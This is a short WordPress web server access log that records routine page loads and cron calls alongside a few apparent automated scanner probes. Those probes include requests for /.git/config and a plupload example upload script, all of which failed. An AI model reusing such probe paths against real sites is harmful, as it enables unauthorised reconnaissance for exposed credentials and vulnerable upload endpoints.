87.120.191.70 - - [30/Sep/2025:05:57:27 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [30/Sep/2025:06:03:15 +0800] "POST /wp-cron.php?doing_wp_cron=1759183395.2703959941864013671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.203.57.3 - - [30/Sep/2025:06:03:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [30/Sep/2025:06:23:02 +0800] "POST /wp-cron.php?doing_wp_cron=1759184582.9595661163330078125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.81.194 - - [30/Sep/2025:06:23:03 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3"
42.236.12.199 - - [30/Sep/2025:06:31:04 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [30/Sep/2025:06:31:28 +0800] "POST /wp-cron.php?doing_wp_cron=1759185088.0545589923858642578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.12.199 - - [30/Sep/2025:06:31:28 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [30/Sep/2025:06:34:43 +0800] "POST /wp-cron.php?doing_wp_cron=1759185283.3233759403228759765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
146.70.124.132 - - [30/Sep/2025:06:34:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
42.236.17.40 - - [30/Sep/2025:06:38:09 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [30/Sep/2025:06:38:13 +0800] "POST /wp-cron.php?doing_wp_cron=1759185493.1462659835815429687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.40 - - [30/Sep/2025:06:38:13 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [30/Sep/2025:06:39:53 +0800] "POST /wp-cron.php?doing_wp_cron=1759185593.4941070079803466796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [30/Sep/2025:06:39:54 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
196.251.86.13 - - [30/Sep/2025:06:55:42 +0800] "GET /sites/all/libraries/plupload/examples/upload.php HTTP/1.1" 404 27 "-" "ALittle Client"
36.133.115.36 - - [30/Sep/2025:07:06:45 +0800] "POST /wp-cron.php?doing_wp_cron=1759187205.3893470764160156250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [30/Sep/2025:07:06:45 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [30/Sep/2025:07:09:52 +0800] "POST /wp-cron.php?doing_wp_cron=1759187392.1149029731750488281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
